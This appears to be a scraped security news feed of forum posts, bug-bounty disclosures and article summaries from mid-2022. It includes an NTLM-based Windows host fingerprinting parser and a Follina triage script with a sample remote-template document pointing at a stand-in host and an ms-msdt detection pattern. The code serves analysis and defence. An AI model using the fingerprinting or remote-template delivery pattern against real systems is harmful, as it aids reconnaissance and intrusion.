    Hi there. I need a consultation. What is the step-by-step algorithm to understand what hardware specifications (CPU, RAM, disks) I need? I tried to set up ELK+Suricata+Zeek on a VM server: 16 CPUs, 32 GB RAM, 950 GB on two disks: OS disk 450 GB, 500 GB dedicated to Elasticsearch. But the amount of processing done by Zeek and Suricata made it a noisy neighbour for other VMs and was killing the hypervisor, so I need to migrate to physical servers, but I don't know how to calculate hardware specifications. submitted by /u/athanielx
    How do you review and document Cyber Security implementation?
    How do you review and document Cyber Security implementation in an organization? submitted by /u/techno_it
    Hardware Raspberry Pi ad-blocker hooked up to WiFi, secure?
    Been using normal ad-blockers since they came about, but I do not like all the data they are getting. How secure is a Raspberry Pi blocker hooked up to my WiFi? Will it cause problems if I, say, use streaming services on my TV for example? Because some ad-blockers in the past have been iffy when it comes to "real" streaming services with ads. And since this will be hardware, I'd rather not unplug it if I need to watch a TV channel's streaming app etc. (I mainly want the ad-blocker for YouTube.) I want to make as safe a closed ecosystem as I can, and still use technology somewhat normally. I'm in the process of securing up everything I've got, times 2. If anyone has other solid tips that I can do on my own (without losing access to normal things) I am happy to hear it. Of course I always do the usual basic stuff, setting everything I can via GUI to barebones at first installation on every program, battling cookies like 50 times per day the last years, etc. etc. etc. It's all so tiresome. submitted by /u/bukush

    War in Ukraine / June 1
    Because of Russia’s war, European countries are reconsidering their military policies Continue reading on Medium »
    Cybersecurity in Costa Rica, by the hand of a non-expert
    IT Now IT NOW Let's talk about cybersecurity. Continue reading on Medium »
    Clean Your Images— OSINT Challenge 25
    We have a really short one for this round of quizzes. Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective… Continue reading on Medium »
    What Is Open Source Intelligence (OSINT)?
    What Is Open Source Intelligence (OSINT)? Continue reading on Medium »

    SecWiki News 2022-06-02 Review
    RAND in-depth report: an overview of US commercial space capabilities and the market, by ourren; Redefining SOAR, by ourren; FirmSec: security research on third-party components in IoT firmware, by ourren; Cobalt Strike web server fingerprint analysis, by ourren; Fuzzm: fuzzing for memory errors in WebAssembly, by ourren. For more recent articles, visit SecWiki.

    US BIS issues cybersecurity export rule; global vulnerability-sharing mechanism faces a serious challenge
    After BIS published the new rule, Microsoft and other tech giants voiced concern that the global mechanism for sharing cybersecurity vulnerabilities could face a serious challenge.
    “Operation Hunt-the-Picture” (猎图行动): analysis of a credential-theft campaign targeting NFT artists
    Based on attack techniques, C2 addresses and other indicators, the activity was attributed to a single group running a large-scale credential-theft campaign; because the attackers' main targets are NFT artworks, Antiy named it “Operation Hunt-the-Picture” (猎图行动).
    FreeBuf Weekly | 3.6 million+ MySQL servers exposed to the internet; Anonymous claims it will attack Belarus
    In the computing industry, “delete the database and run” (删库跑路) has long been a running joke that programmers use to vent work stress.
    A brief analysis of an Excel email-attack sample
    The email exploited CVE-2017-11882 (the EQNEDT32.EXE Equation Editor vulnerability).
    Telegraph may already be widely abused in phishing
    Observers recently found that Telegraph, the anonymous blogging platform of the messaging app Telegram, may be actively used by phishers.
    An employee “deletes the database and runs”: can they really just walk away?
    Hard to imagine, but fiction has become reality: someone actually dared to try deleting the database and walking away.
    SlowMist: analysis of the NFT project “verb” phishing site
    Stay skeptical of everything.
    FreeBuf Morning Report | Twice as many healthcare organizations paid ransoms as before; three quarters of companies suffered downtime from DNS attacks
    Nearly three quarters of companies have suffered downtime because of DNS attacks.
    Hundreds of Elasticsearch databases hit by ransom attacks
    Weak security on Elasticsearch databases has made them a target for attackers.
    Major security event! 3.6 million+ MySQL servers exposed to the internet
    At least 3.6 million MySQL servers are exposed on the internet, and they will undoubtedly be attractive targets for hackers and ransomware attackers.
    Europol announces takedown of the FluBot malware
    In a recent joint law-enforcement operation involving 11 countries, Europol announced it had taken down FluBot, a malware operation that mainly targeted users' online-banking accounts.
    Key points for assessing cryptographic application security: digital signatures
    Digital signatures combine asymmetric cryptography with message digest algorithms into an excellent, widely used solution that touches on many concepts.

    Complete Bug Bounty CheatSheet | Joas Antonio
    XSS, SQLi, SSRF, CRLF, CSV-Injection, Command Injection, Directory Traversal, LFI, XXE, Open-Redirect, RCE, Crypto, Template Injection… Continue reading on Medium »
    How I Mass hunt for Admin Panel Access…
    Hello All,🙂 Continue reading on Medium »
    Reverse Engineering Discord’s Party Mode
    Continue reading on Dev Genius »
    HTML Injection On Trio App
    Hey Hackers!!! I am back again! My name is Krishnadev P Melevila, To know more about me, Search on Google “ Who is Krishnadev P Melevila”! Continue reading on Medium »
    HTML Injection On Trio App
    Hey Hackers!!! I am back again! My name is Krishnadev P Melevila, To know more about me, Search on Google “ Who is Krishnadev P Melevila”! Continue reading on InfoSec Write-ups »

    AWS Load Balancer Controller Managed Security Groups can be replaced by an unprivileged attacker
    Kubernetes disclosed a bug submitted by t0rr3sp3dr0: https://hackerone.com/reports/1238017 - Bounty: $500
    AWS Load Balancer Controller can be used by an attacker to modify rules of any Security Group that they are able to tag
    Kubernetes disclosed a bug submitted by t0rr3sp3dr0: https://hackerone.com/reports/1238482 - Bounty: $500

    Real Player Remote Arbitrary Code Execution Vulnerability
    Article URL: https://github.com/Edubr2020/RP_DCP_Code_Exec Comments URL: https://news.ycombinator.com/item?id=31589107 Points: 2 # Comments: 1
    A powerful vulnerability scanner for Windows, macOS and Linux that you will love
    Article URL: https://www.mageni.net/ Comments URL: https://news.ycombinator.com/item?id=31588325 Points: 2 # Comments: 0
    CVE-2022-23088 – FreeBSD Network Subsystem Remote Code Execution Vulnerability
    Article URL: https://www.freebsd.org/security/advisories/FreeBSD-SA-22:07.wifi_meshid.asc Comments URL: https://news.ycombinator.com/item?id=31583875 Points: 1 # Comments: 1
    Microsoft Office zero-day vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190 Comments URL: https://news.ycombinator.com/item?id=31580756 Points: 6 # Comments: 0

    SANS FOR500 with no prior forensic experience?
    I am currently a Threat Intelligence Analyst. I was thinking about taking the FOR500 since I want to transition to forensics. I am hesitant since I have no forensic experience/knowledge. Coming from a non-technical background, would you recommend this course? submitted by /u/hackprincess
    Avilla Forensics 3.0
    https://github.com/AvillaDaniel/AvillaForensics 🔎 A very powerful set of tools for a forensic specialist. For full-fledged work, Java and Python are required (packages: instaloader, mvt, pycryptodome and Whacipher). To work with smartphones, they must have debugging mode enabled. But the abundance of capabilities that we get for free is just amazing. Yes, there are products from Oxygen Software in Russia, but they are paid, although not much better, probably only working with cloud services like Oxygen, which is not enough; but do not forget that it's all completely free. submitted by /u/saqfi

    Exfiltrate GDrive access token using CSRF
    Dropbox disclosed a bug submitted by staz0t: https://hackerone.com/reports/1468010 - Bounty: $1728
    User can bypass password enforcement when federated sharing is enabled
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/838510 - Bounty: $250

    Security Validation Tools
    Hey all, I was listening to a webinar today and one of the experts brought up security validation tools, which I hadn't heard of before. I was curious if folks are using any of these, and what are they using? The way it was explained is a potential red team or other smaller team looking to find gaps in their own security. Some background: I've brought my company huge strides over the past 5 years improving our cyber program from training, monitoring, pentesting, everyday preventative tools, and annual 3rd-party program maturation, but I don't know what I don't know, so I'm very curious. Appreciate everyone's time. submitted by /u/derf3970
    Ditching the OOTB SIEM
    After a less than successful SIEM transition, I am starting to look at the possibility of building a SIEM by integrating multiple COTS products. Essentially looking at integrating a data lake, XDR/correlation capability and a SOAR solution. Has anyone successfully done this (aside from Palo's SOC) and have any input/feedback to share? submitted by /u/Omnipotent0ne

    Some flicks
    http://www.lemaurecourtois.com/film/ submitted by /u/DismalDelay101
    Teaching Content site...! probably boring
    https://www.futuremanagers.com/wp-content/uploads/ submitted by /u/RE167
    Index of movies and media
    https://setnomanime.me/9:/Movies/ submitted by /u/Isolatedleliel

    Seven Essential Questions for Ethical War Crimes Documentation
    Considerations for those collecting, investigating, and analyzing open source information in Ukraine and elsewhere Continue reading on Human Rights Center »
    War in Ukraine / May 31
    Difficult situation in Severodonetsk Continue reading on Medium »

    How I found a GoldMine but got No Gold
    Background: Continue reading on Medium »
    Microsoft Dynamics Container Sandbox RCE via Unauthenticated Docker Remote API: $20,000 Bounty
    On 17.11.2021 I reported a critical security issue in Microsoft Dynamics Container Sandbox, that allows Microsoft Customers to setup a… Continue reading on Medium »
    Cryptography a Foundation of Cyber Security.
    Continue reading on Medium »
    Part 2: A pragmatic guide to building your bug bounty program
    Budgets and payments, and dealing with beg bounties Continue reading on Airwallex Engineering »
    WordPress User Meta Lite / Pro 2.4.3 Suffers Path Traversal Exploit
    More @ https://skynettools.com  Currently the WordPress Plugin User Meta 2.4.3, both Lite and Pro is vulnerable to a Path Traversal… Continue reading on Medium »
    Good to see you back. I have always loved your write ups. Simple and to the point. Keep it up
    Continue reading on Medium »

    Using Python to unearth a goldmine of threat intelligence from leaked chat logs
    submitted by /u/SCI_Rusher
    Information Security BASICS - Anvil Secure
    submitted by /u/anvilventures
    Unofficial patches for the 0-day vulnerability called Follina (CVE-2022-30190)
    submitted by /u/CyberMasterV
    GCP exploitation & lateral movement write up! - @securfreakazoid
    submitted by /u/securfreakazoid
    Twitch Internal Security Tools: In-depth Analysis of the Leaked Twitch Security Tools
    submitted by /u/mazen160
    Sushi Time: Hunting for Fresh Phish
    submitted by /u/0xDAV1D
    OST2 Vulnerabilities 1001: C-Family Software Implementation Vulnerabilities (Taught via explaining > 3 dozen CVEs from the last 3 years)
    submitted by /u/OpenSecurityTraining
    Minerva's evasion based CTF is open for registration
    submitted by /u/woja111

    Enumeration and lateral movement in GCP environments
    This write up is about a pentest we did in which we managed to compromise a hybrid GCP hosted infrastructure using native GCP tools for… Continue reading on InfoSec Write-ups »
    Home-Grown Red Team: Using PhishPi For Captive Portal Evil Twin Attacks And Website Cloning
    A captive portal is one of the more interesting topics in the Wifi hacking arena. If you’re not familiar with what a captive portal is or… Continue reading on Medium »

    Code Intelligence raises $12M to build dev-first advanced fuzzing solutions
    Article URL: https://www.code-intelligence.com/blog/series-a Comments URL: https://news.ycombinator.com/item?id=31584225 Points: 4 # Comments: 0

    SecWiki News 2022-06-01 Review
    Research report on the impact of the Bluetooth protocol on automotive security, by lxghost; The dilemma of SCA and a way out, by ourren; A summary and primer on graph neural networks and cognitive reasoning, by ourren; SSL fingerprinting and bypass, by ourren; APICraft: generating fuzz drivers for closed-source SDK libraries, by ourren. For more recent articles, visit SecWiki.

    Browser automation frameworks become a tool for attackers
    More and more threat actors are using a free browser automation framework as part of their attack campaigns.
    How to use C2concealer to generate randomized Malleable C2 profiles
    C2concealer is a powerful command-line tool that helps researchers easily generate randomized Cobalt Strike Malleable C2 profiles.
    How to use ShadowClone to get the most out of cloud services
    ShadowClone helps us take full advantage of the free tier that cloud providers offer and greatly scale up the capability of command-line tools.
    IoT endpoint security primer and practice: playing with IoT firmware (part 1)
    This installment covers how to obtain firmware from IoT endpoint devices and techniques for extracting and analyzing the file system.
    FreeBuf Morning Report | US publishes guidance for building public research databases; scammers exploit the Russia-Ukraine conflict to collect “donations”
    The White House Office of Science and Technology Policy (OSTP) recently released guidance on the desirable characteristics of federally funded research data repositories.
    Fuzzing in Go (part 1): go-fuzz
    An introduction to using the Go fuzzing tool go-fuzz.
    FreeBuf enterprise-security group discussion | Have you experienced threat false positives?
    Faced with a flood of newly added vulnerabilities, how do you pick out the ones that are genuinely threatening, judge them quickly and accurately, and reduce the false-positive rate?
    2021 OWASP Top 10 one by one: A04:2021 – Insecure Design
    This article focuses on A02 Cryptographic Failures.
    Microsoft MSDT zero-day now weaponized in Cobalt Strike
    The zero-day reportedly affects multiple Microsoft Office versions, including Office, Office 2016 and Office 2021.
    Quietly, Google has banned deepfake projects on Colab
    Reports indicate Google has quietly banned deepfake projects on its Colaboratory service.
    Obtaining Windows remote host information via DCERPC and NTLMSSP
    This article uses a DCERPC ping with NTLMSSP authentication information attached to obtain the version number and other information of a remote Windows host.
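    The item above describes fingerprinting a remote Windows host from the NTLMSSP data exchanged during a DCERPC bind. The decoding half of that technique is shown below as an added example written for this page, not code from the article: it parses the NTLM CHALLENGE_MESSAGE (Type 2) that the server returns with the bind_ack and extracts the Version field (OS major/minor/build) and the AV_PAIR target info (NetBIOS and DNS names). The message bytes are constructed inline with made-up names (CORP, DC01, corp.example) and a made-up build number; the transport (sending the bind to TCP/135 and pulling the NTLMSSP blob out of the bind_ack auth trailer) is left out.

```python
import struct
from dataclasses import dataclass, field
from typing import Optional

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
CHALLENGE_MESSAGE = 2
NEGOTIATE_UNICODE = 0x00000001
NEGOTIATE_TARGET_INFO = 0x00800000
NEGOTIATE_VERSION = 0x02000000

# AV_PAIR ids from MS-NLMP 2.2.2.1; only the ones useful for host fingerprinting.
AV_IDS = {
    1: "MsvAvNbComputerName",
    2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName",
    4: "MsvAvDnsDomainName",
    5: "MsvAvDnsTreeName",
    7: "MsvAvTimestamp",
}


@dataclass
class ChallengeInfo:
    target_name: str
    flags: int
    version: Optional[tuple]          # (major, minor, build) or None if not advertised
    av_pairs: dict = field(default_factory=dict)


def parse_av_pairs(data: bytes) -> dict:
    """Decode the TargetInfo AV_PAIR list: AvId(2) AvLen(2) Value, terminated by MsvAvEOL (id 0)."""
    pairs = {}
    pos = 0
    while pos + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, pos)
        pos += 4
        value = data[pos:pos + av_len]
        pos += av_len
        if av_id == 0:
            break
        name = AV_IDS.get(av_id, f"MsvAvUnknown{av_id}")
        if av_id == 7 and av_len == 8:
            pairs[name] = struct.unpack("<Q", value)[0]   # FILETIME, 100 ns ticks since 1601
        elif av_id in (1, 2, 3, 4, 5):
            pairs[name] = value.decode("utf-16-le")      # names are UTF-16LE
        else:
            pairs[name] = value.hex()
    return pairs


def parse_challenge(blob: bytes) -> ChallengeInfo:
    """Parse an NTLM CHALLENGE_MESSAGE (Type 2) as laid out in MS-NLMP 2.2.1.2."""
    if blob[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    (msg_type,) = struct.unpack_from("<I", blob, 8)
    if msg_type != CHALLENGE_MESSAGE:
        raise ValueError(f"expected CHALLENGE_MESSAGE (2), got {msg_type}")
    tn_len, _tn_max, tn_off = struct.unpack_from("<HHI", blob, 12)   # TargetNameFields
    (flags,) = struct.unpack_from("<I", blob, 20)                    # NegotiateFlags
    # Bytes 24..31 (ServerChallenge) and 32..39 (Reserved) are not needed for fingerprinting.
    ti_len, _ti_max, ti_off = struct.unpack_from("<HHI", blob, 40)   # TargetInfoFields
    version = None
    if flags & NEGOTIATE_VERSION:
        major, minor, build = struct.unpack_from("<BBH", blob, 48)   # Version field at offset 48
        version = (major, minor, build)
    target_name = blob[tn_off:tn_off + tn_len].decode("utf-16-le")
    info = ChallengeInfo(target_name, flags, version)
    if flags & NEGOTIATE_TARGET_INFO and ti_len:
        info.av_pairs = parse_av_pairs(blob[ti_off:ti_off + ti_len])
    return info


def build_sample_challenge() -> bytes:
    """Constructed CHALLENGE_MESSAGE for this example (not a real capture; names and build are made up)."""
    def av(av_id: int, text: str) -> bytes:
        v = text.encode("utf-16-le")
        return struct.pack("<HH", av_id, len(v)) + v

    target = "CORP".encode("utf-16-le")
    target_info = (av(2, "CORP") + av(1, "DC01") + av(4, "corp.example")
                   + av(3, "dc01.corp.example") + struct.pack("<HH", 0, 0))
    flags = NEGOTIATE_UNICODE | NEGOTIATE_TARGET_INFO | NEGOTIATE_VERSION
    tn_off = 56                       # fixed header size including the Version field
    ti_off = tn_off + len(target)
    msg = NTLMSSP_SIGNATURE
    msg += struct.pack("<I", CHALLENGE_MESSAGE)
    msg += struct.pack("<HHI", len(target), len(target), tn_off)
    msg += struct.pack("<I", flags)
    msg += b"\x11" * 8                # ServerChallenge (arbitrary in the sample)
    msg += b"\x00" * 8                # Reserved
    msg += struct.pack("<HHI", len(target_info), len(target_info), ti_off)
    msg += struct.pack("<BBH", 10, 0, 17763) + b"\x00\x00\x00" + b"\x0f"  # Version 10.0.17763, NTLMRevision 15
    return msg + target + target_info


if __name__ == "__main__":
    info = parse_challenge(build_sample_challenge())
    print(info.version, info.target_name, info.av_pairs)
```

    The same parser applies to any NTLM CHALLENGE_MESSAGE, not only one obtained over DCERPC: SMB, HTTP NTLM authentication and RDP (CredSSP) return the identical structure, so one decoder covers every unauthenticated NTLM fingerprinting path.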
    Scammers exploit the Russia-Ukraine conflict to collect “donations” on a large scale
    The FBI found scammers impersonating legitimate Ukrainian humanitarian aid organizations and collecting donations under the pretext of helping Ukrainian refugees and war victims.
    Analysis of a Patchwork (摩诃草) campaign using Pakistani government agency documents as lures
    Background: Patchwork (摩诃草), also known as Hangover and White Elephant (白象), is tracked internally by QiAnXin as APT-Q-36.
    Shupeng Technology (数篷科技): a zero-trust data security solution for the full data lifecycle | SOLO launch season for new cybersecurity players
    How should enterprise security respond to the new challenges of its environment? The SOLO launch season for new cybersecurity players will tell you!
    Heads up: the fix for Microsoft's MSDT zero-day is here
    On May 30, Microsoft published mitigations that block attackers from exploiting this zero-day remotely.

    How I am winning battle with Windows 10 and 11 Security and avoiding detection

    TryHackMe linuxloganalysis Writeup
    TryHackMe ramanalysis Writeup
    TryHackMe tsharkpcapanalysis Writeup
    SSO: A Secure way for authentication and authorization?
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe Pcap Analysis Room Official Writeup
    HackTheBox: Lame
    Erlik Machine Writeup
    Serial Communication with Raspberry Pi Pico in Windows 10/11 via WSL
    Top 5 Hacking Books, Must Read!!
    Persistent Windows 10 and 11 keylogger (keylogiq)

    Threat Brief: CVE-2022-30190 – MSDT Code Execution Vulnerability
    CVE-2022-30190 enables remote code execution with the same privileges as the calling application, and there are proof-of-concept examples of zero-click variants. We recommend protections and mitigations. The post Threat Brief: CVE-2022-30190 – MSDT Code Execution Vulnerability appeared first on Unit42.
    Network Security Trends: November 2021 to January 2022
    Network security trends observed November 2021 to January 2022 included high levels of cross-site scripting. The post Network Security Trends: November 2021 to January 2022 appeared first on Unit42.

    Django debug enabled showing information about system, database, configuration files
    Glovo disclosed a bug submitted by omarelfarsaoui: https://hackerone.com/reports/1561377
    Deprecated owners.query API bypasses object view policy
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1584409 - Bounty: $300
    Able to bypass the fix on DOM XSS at [www.adobe.com]
    Adobe disclosed a bug submitted by saajanbhujel: https://hackerone.com/reports/1398374
    DOM XSS on www.adobe.com
    Adobe disclosed a bug submitted by saajanbhujel: https://hackerone.com/reports/1260825
    CSRF token validation system is disabled on Stripe Dashboard
    Stripe disclosed a bug submitted by rodolfomarianocy: https://hackerone.com/reports/1493437 - Bounty: $2500
    Improper input-size validation on the user new session name can result in server-side DDoS.
    Nextcloud disclosed a bug submitted by demonia: https://hackerone.com/reports/1153138 - Bounty: $100
    Blind XSS on https://open.vanillaforums.com
    Vanilla disclosed a bug submitted by mohit0786: https://hackerone.com/reports/1189885 - Bounty: $300
    Self XSS in attachments name
    Acronis disclosed a bug submitted by mega7: https://hackerone.com/reports/1536901

    How Fuzzing Helped Me Get My First Bounty
    Hello Everyone, Continue reading on Medium »
    Astar Network Hosts a $1 million Bug Bounty Program on Immunefi
    05/31/2022 — We are launching a bug bounty program with Immunefi, Web3’s leading bug bounty platform, already protecting $100 billion in… Continue reading on Astar Network »
    From open redirect to RCE in one week
    I will tell you a story of how I chained multiple security issues to achieve RCE on several hosts of the Mail.Ru Group (or VK now). Continue reading on Medium »
    RootME: walkthrough
    Once again back with another story of hacking on the TryHackMe platform.The room this time a free room anyone can give it a try without a… Continue reading on Medium »
    Abusing Facebook’s feature for a permanent account confusion (logic vulnerability)
    TLDR; Logic vulnerability on Facebook led to half 2FA bypass/denial of service by locking users to login into the attacker’s controlled… Continue reading on Medium »
    SQL injection to Remote Command Execution (RCE)
    Hello hackers, before we get into it, I would like to know your view of this — between a hacker’s curiosity and instinct which would you… Continue reading on Medium »
    Price Parameter Tampering | How I Change Any Price on Website
    Hi everyone how are you?, I hope you guys are well. I’m RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I… Continue reading on Medium »
    Web service-specific vulnerability scanners
    Vulnerability scanners are automated tools that crawl an application to identify the signatures of known vulnerabilities. Continue reading on Medium »

    Unknown JS from Chrome Extension
    Found an unknown extension installed on a user's device that was loaded via a PowerShell script. JS is not my forte by any stretch of the imagination. Can anyone help me get an idea of what's happening here? The extension was loaded with this script set in the background. https://pastebin.com/p8sS0cye submitted by /u/phase
    Threat Intel services with CAPEC or CWE classifications?
    I've recently been doing a lot of work with using threat intel feeds (which map threat activity to MITRE ATT&CK TTPs) to support enterprise threat modeling. Wondering if it's possible to do the same with application threat modeling. Obviously, ATT&CK is not app-focused, so my current service (which only maps to ATT&CK) won't do the job. Does anybody know of any threat intel services that map threat activity to CAPEC or CWE classifications, for more granular app-level threat intel? submitted by /u/drstarskymrhutch
    Are exes logged somewhere?
    Is execution of programs (both in Program Files and portable ones) logged somewhere in Windows? Event Viewer maybe? Registry? Other places? I mean a default Windows 10/11 installation. Thanks for the help. submitted by /u/AnotherRedditUsr

    CVE-2022-21404: Another story of developers fixing vulnerabilities unknowingly because of CodeQL
    submitted by /u/cldrn
    From open redirect to RCE in one week
    submitted by /u/smaury
    How to use Atomic Red Team to test Falco rules in K8s
    submitted by /u/MiguelHzBz
    Want to be a HVACker? Learn some new skills by exploiting security, fire, and HVAC systems
    submitted by /u/entropydaemon6

    Nmap Post Port Scans | TryHackMe (THM)
    Lab Access: https://tryhackme.com/room/nmap04 Continue reading on Medium »

    [Security Advisory] Microsoft Office Remote Code Execution Vulnerability (CVE-2022...
    Microsoft Office has a remote code execution vulnerability. An attacker can use the remote template feature of a malicious Office file to fetch a malicious HTML file from a server and then execute malicious PowerShell through the 'ms-msdt' URI...
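    The advisory summary above (and the Unit42 threat brief earlier on this page) describes the delivery chain: an external relationship in the Office document makes Word fetch an HTML page from an attacker-controlled server, and that page hands off to the ms-msdt: URI handler. The following is an added example written for this page, not code from the advisory or from Microsoft: a triage check a responder can run offline against a suspicious .docx. It unzips the OOXML package, lists relationships with TargetMode="External" that point at a network target, reports the auto-loading types (oleObject, attachedTemplate) and leaves ordinary hyperlinks aside; a second function flags the ms-msdt: handoff in a fetched page. The .docx, the URL (203.0.113.10, a documentation-range address) and the HTML snippet are all constructed for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Relationship types (last path segment) that Word resolves automatically on open.
# Hyperlinks are External too, but only fire on click, so they are listed and not flagged.
SUSPICIOUS_REL_TYPES = {"oleObject", "attachedTemplate"}
NETWORK_PREFIXES = ("http://", "https://", "\\\\")   # web and UNC targets
MSDT_RE = re.compile(r"ms-msdt:", re.IGNORECASE)

# Constructed second-stage page for the example; it only names the handler and is not a working payload.
SAMPLE_HTML = '<html><script>window.location.href = "ms-msdt:/id PCWDiagnostic";</script></html>'


def find_external_rels(docx_bytes: bytes) -> list:
    """Every relationship in the package whose TargetMode is External and whose target is a network location."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                if target.lower().startswith(NETWORK_PREFIXES):
                    hits.append({
                        "part": name,
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": target,
                    })
    return hits


def triage_docx(docx_bytes: bytes) -> list:
    """One finding per auto-loading external relationship, i.e. the remote-template delivery pattern."""
    return [f"{r['part']}: {r['type']} -> {r['target']}"
            for r in find_external_rels(docx_bytes)
            if r["type"] in SUSPICIOUS_REL_TYPES]


def html_references_msdt(html: str) -> bool:
    """Second-stage check: does the fetched page hand off to the ms-msdt: protocol handler?"""
    return MSDT_RE.search(html) is not None


def build_sample_docx(target_url: str) -> bytes:
    """Constructed minimal package for this example: one benign hyperlink plus one external oleObject."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" '
        'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '</Types>')
    document = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p><w:r><w:t>sample</w:t></w:r></w:p></w:body></w:document>')
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{REL_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
        'Target="https://example.org/" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
        f'Target="{target_url}" TargetMode="External"/>'
        '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", document)
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://203.0.113.10/template.html")
    for finding in triage_docx(sample):
        print("FLAG", finding)
    print("second stage references ms-msdt:", html_references_msdt(SAMPLE_HTML))
```

    Both checks are indicators, not proof: an external oleObject or attachedTemplate relationship is rare in legitimate mail attachments but does occur with templates on intranet shares, so pair a hit with the content actually served at the target before escalating. The advisory on this page mentions the mitigation Microsoft published; its guidance was to disable the MSDT URL protocol handler, which removes the second stage regardless of the document that triggers it.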

    Questions about responsible disclosure
    I just found my first few vulnerabilities in a real-world target, and I realize I don't really know how to properly disclose them to the vendor. The target is closed source and it is a relatively large vendor, so it isn't really clear how I should contact them. Any advice or standards about how I can determine who to contact? Also, what is typically expected in the body of the report? I'm planning on including a brief description of the vulnerabilities as well as a proof of concept and simple exploit. Is there anything else I should plan to include? Thanks in advance. submitted by /u/BinaryLuddite
    Exploit Development Resources
    https://github.com/wtsxDev/Exploit-Development Share and Support! submitted by /u/saqfi

    High-Throughput, Formal-Methods-Assisted Fuzzing for LLVM
    Article URL: https://blog.regehr.org/archives/2148 Comments URL: https://news.ycombinator.com/item?id=31572268 Points: 3 # Comments: 0

    War in Ukraine / May 30
    The military threat from Belarus remains Continue reading on Medium »
    Sakura Room OSINT CTF Writeup
    Here’s my writeup of the Sakura Room OSINT CTF by OSINT Dojo on TryHackMe, including solutions (spoiler alert!). Continue reading on Medium »
    Horse hunting: How we found Sofia Abramovich’s horses
    Insights from the Russian Asset Tracker project Continue reading on OCCRP: Unreported »

    GCIH training materials
    Hi, can anyone recommend "external" (i.e. not SANS) training materials for GCIH for self study? Yes, I know SANS has their own books, but if I could attend I would. Thanks in advance for not telling me how SANS is the only way. submitted by /u/Hot-Supermarket5177 [link] [comments]

    SecWiki News 2022-05-31 Review
    Twitter Threat Intelligence Tracking and Assessment by Avenger; A Brief Discussion of Traditional Windows Forensics by ourren. For more of the latest articles, visit SecWiki

    Killing The Bear - New actor added: BlackCat (a.k.a Alphv)
    New actor BlackCat (a.k.a Alphv - Noberus) added to 🐻 KillingTheBear 📙 https://killingthebear.jorgetesta.tech/actors/alphv It comes heavily loaded with TTPs and IOCs , processes, records, etc so SOC, CTI, Threat Hunting people take advantage and give it a try. Apart from the traditional sections, also added a timeline of victims and attacks. submitted by /u/J-Testa [link] [comments]
    Finding Main() with Ghidra
    submitted by /u/DLLCoolJ [link] [comments]

    Zero-day vulnerability under active exploitation may affect multiple Microsoft Office versions
    Recently, security researcher nao_sec discovered a malicious Word document that had been uploaded from Belarus to the analysis service VirusTotal.
    FreeBuf Morning Report | FluBot malware sweeps Europe; South African president's personal credit data leaked
    The hacking group SpiderLog$ published stolen records detailing the South African president's loans since the 2000s at one of the country's four largest banks.
    Building a free proxy pool with Tencent Cloud Functions (setup process)
    Recently I heard a mentor mention that a proxy pool built on cloud functions can act as a proxy to hide your IP; the principle is that cloud functions can send outbound packets, combined with a SOCKS service. This is a record of the setup process.
    New WhatsApp scam exposed, can hijack user accounts
    Experts warn that a new WhatsApp OTP scam is being widely exploited; attackers can hijack a user's account over a phone call.
    Anonymous claims it will launch an intrusion against Belarus
    The Anonymous hacker group Spid3r claims to have attacked Belarusian government websites in retaliation for Belarus supporting Russia's invasion of Ukraine.

    DedeCMS file upload vulnerability analysis
    Author: Topsec Alpha Lab. Original link: https://mp.weixin.qq.com/s/tLyoN9JYRUAtOJTxWEP8DQ 0x01 Preface: A while ago I saw an article about a DedeCMS backend file upload vulnerability (CNVD-2022-33420) that bypassed the blacklist filtering of uploaded file contents. Since I had recently been studying file uploads, I wrote this article, which covers two DedeCMS file upload vulnerabilities (CVE-2018-2012...

    technical specs and schematics for rocket engines
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    photos of Brussels
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

    Computer Forensics and Digital Investigations Bachelor's degree question
    Hi all, I've been in the IT field for around 12 years, ranging from Scrum Master to Software Engineering Manager (where I've now been a few years). I've been completely fascinated by Computer Forensics though and would love to break into this area. For me, I learn best with structure so I prefer taking a formal program. Is anyone familiar with Champlain College? They have an online bachelor's degree in Computer Forensics and Digital Investigations that I've been looking into. Would love to hear any experience there, or recommendations for other programs! I'm going to continue working full time, so it's important that the program is online only. submitted by /u/anautumnsshade [link] [comments]
    Converting MAC images
